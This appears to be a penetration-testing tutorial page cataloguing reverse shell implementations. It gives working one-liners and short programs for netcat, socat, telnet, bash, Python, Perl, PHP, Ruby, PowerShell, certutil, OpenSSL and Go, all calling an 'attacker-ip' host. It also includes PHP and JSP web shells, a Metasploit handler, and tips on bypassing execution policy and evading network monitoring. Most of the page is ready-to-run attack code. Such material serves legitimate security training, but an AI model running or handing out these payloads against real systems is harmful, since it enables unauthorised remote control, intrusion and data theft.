Types of Reverse Shells

Comprehensive guide to different reverse shell implementations across various languages and platforms

This section explores the various implementations of reverse shells across different programming languages, command-line utilities, and operating systems. Each type has its own advantages, limitations, and ideal use cases.

Command-Line Utilities

Many standard command-line utilities can be repurposed to create reverse shells without requiring additional software installation on the target system.

Netcat

Often referred to as the "Swiss Army knife" of networking, Netcat is one of the most versatile tools for creating reverse shells.

# Traditional netcat reverse shell
nc -e /bin/bash attacker-ip 4444

# For netcat versions without -e flag
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc attacker-ip 4444 >/tmp/f

Key Points:

  • Available on most Unix/Linux systems
  • Some versions lack the -e flag for security reasons
  • The FIFO pipe method works on most systems but is more complex
  • Windows versions (ncat) typically include the -e flag

Socat

Socat is an advanced relay tool that improves upon netcat with additional features.

# Basic socat reverse shell
socat TCP:attacker-ip:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane

# Encrypted socat reverse shell
# First, generate a certificate on the attacker machine:
# openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# cat shell.key shell.crt > shell.pem

# Then on the target:
socat OPENSSL:attacker-ip:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane

Key Points:

  • More feature-rich than netcat
  • Can create fully interactive TTY shells
  • Supports SSL/TLS encryption
  • Less commonly installed by default

Telnet

When netcat isn't available, telnet can be used as an alternative.

# Using telnet for a reverse shell
rm -f /tmp/p; mknod /tmp/p p && telnet attacker-ip 4444 0/tmp/p 2>&1

Key Points:

  • Widely available on many systems
  • More limited functionality than netcat
  • Requires named pipe creation

Scripting Languages

Scripting languages offer powerful and flexible ways to create reverse shells, often with just a few lines of code.

Bash

# Basic bash reverse shell
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

# Alternative method using exec
0<&196;exec 196<>/dev/tcp/attacker-ip/4444; sh <&196 >&196 2>&196

Key Points:

  • No additional tools required on Linux/Unix systems
  • Uses the special /dev/tcp/ device file
  • May not work on all bash versions (e.g., macOS)

Python

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker-ip",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Key Points:

  • Python is commonly installed on many systems
  • Works across different platforms
  • Can be easily modified for specific requirements
  • Python 3 version can directly spawn a PTY shell

Perl

perl -e 'use Socket;$i="attacker-ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Key Points:

  • Available on most Unix/Linux systems
  • Works well in environments where Python isn't available
  • Similar functionality to Python reverse shells

PHP

<?php
// Method 1: Using system function
$sock = fsockopen("attacker-ip", 4444);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>

Key Points:

  • Ideal for web server compromises
  • Can be embedded in web applications
  • Multiple implementation methods
  • Often used in file upload vulnerabilities

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attacker-ip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Key Points:

  • Less common but useful when Ruby is installed
  • Compact one-liner available
  • Works well on systems with Ruby installed (like macOS)

Windows-Specific Shells

Windows systems require different approaches due to their distinct command shells and system architecture.

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("attacker-ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Key Points:

  • Native to Windows environments
  • Powerful scripting capabilities
  • Can bypass execution policy restrictions
  • Base64 encoding helps evade detection
  • Can download and execute payloads from remote servers

Command Prompt

# Using certutil to download netcat and create a reverse shell
certutil -urlcache -split -f "http://attacker-ip/nc.exe" C:\Windows\Temp\nc.exe
C:\Windows\Temp\nc.exe -e cmd.exe attacker-ip 4444

Key Points:

  • Requires downloading external tools in most cases
  • Limited functionality compared to PowerShell
  • Useful when PowerShell is restricted

Web-Based Shells

Web applications can be leveraged to create reverse shells when you have the ability to execute code on a web server.

PHP Web Shell

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}
?>

{/* Usage: http://target-server/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/attacker-ip/4444 0>%261' */}

Key Points:

  • Simple to deploy if you can upload PHP files
  • Can be triggered via HTTP requests
  • Allows for command execution without a persistent connection
  • Can be used to launch a full reverse shell

JSP Web Shell

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>

{/* Usage: http://target-server/shell.jsp?cmd=powershell -c "$client=New-Object System.Net.Sockets.TCPClient('attacker-ip',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" */}

Key Points:

  • Useful for Java-based web servers
  • Similar concept to PHP web shells
  • Can be used to launch native reverse shells

Advanced and Specialized Shells

These shells offer additional features or are designed for specific scenarios.

Meterpreter

Meterpreter is an advanced payload that provides an interactive shell with extensive features.

# On the attacker machine (using Metasploit):
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp  # or another appropriate payload
set LHOST attacker-ip
set LPORT 4444
run

Key Points:

  • Part of the Metasploit Framework
  • Runs entirely in memory (no disk writing)
  • Provides advanced features like file transfer, screenshot capture, and privilege escalation
  • Available for multiple platforms (Windows, Linux, Android, etc.)
  • Can migrate between processes

OpenSSL

Encrypted reverse shells can be created using OpenSSL.

# On the attacker machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

# On the target machine:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect attacker-ip:4444 > /tmp/s; rm /tmp/s

Key Points:

  • Provides encrypted communication
  • Harder to detect with network monitoring
  • Looks like legitimate SSL/TLS traffic
  • Available on many systems by default

Golang Reverse Shell

package main
import (
    "net"
    "os/exec"
    "time"
)

func main() {
    for {
        conn, err := net.Dial("tcp", "attacker-ip:4444")
        if err == nil {
            cmd := exec.Command("/bin/sh")
            cmd.Stdin = conn
            cmd.Stdout = conn
            cmd.Stderr = conn
            cmd.Run()
            conn.Close()
            break
        }
        time.Sleep(5 * time.Second)
    }
}

Key Points:

  • Can be compiled for multiple platforms
  • Statically linked (no dependencies)
  • More difficult to detect than script-based shells
  • Can implement retry logic and other advanced features

Choosing the Right Reverse Shell

The optimal reverse shell depends on several factors:

  1. Target Environment:

    • Available interpreters/languages
    • Operating system
    • Security controls in place

  2. Network Considerations:

    • Firewall rules
    • Egress filtering
    • Network monitoring

  3. Operational Requirements:

    • Need for encryption
    • Stability requirements
    • Required features

In the next section, we'll explore advanced techniques for creating more sophisticated and resilient reverse shells.